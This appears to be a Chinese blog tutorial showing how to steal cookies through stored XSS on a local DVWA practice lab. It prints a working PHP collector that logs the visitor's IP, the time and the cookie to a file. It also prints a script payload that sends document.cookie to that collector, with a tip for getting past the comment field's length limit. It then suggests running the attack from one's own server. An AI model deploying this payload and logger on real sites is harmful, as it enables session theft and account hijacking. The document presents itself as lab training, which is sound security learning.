存储xss实现获取cookie(本地实战)

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

复制代码
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

相关推荐
Bruce_Liuxiaowei3 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
爱敲代码的小旗8 天前
Vue 项目安全设置方案:XSS/CSRF 防护指南
vue.js·安全·xss
云博客-资源宝8 天前
php防注入和XSS过滤参考代码
开发语言·php·xss
全宝9 天前
🛡️ Vue项目XSS攻击防护指南:从漏洞发现到js-xss完美解决
前端·javascript·xss
16年上任的CTO12 天前
常见网络攻击类型及防护手段
网络攻击模型·ddos·xss·sql注入·网络防护·xsrf·arf
fatsheep洋14 天前
XSS的原型链污染1--原型链解释
前端·xss
样子201815 天前
PHP 之使用HTMLPurifier过滤XSS
开发语言·前端·php·xss
fatsheep洋18 天前
XSS-DOM-1
java·前端·xss
Status_50018 天前
XSS跨站脚本攻击详解
web安全·xss
麦兜*19 天前
【HTTP】防XSS+SQL注入:自定义HttpMessageConverter过滤链深度解决方案
java·网络·spring boot·sql·spring·http·xss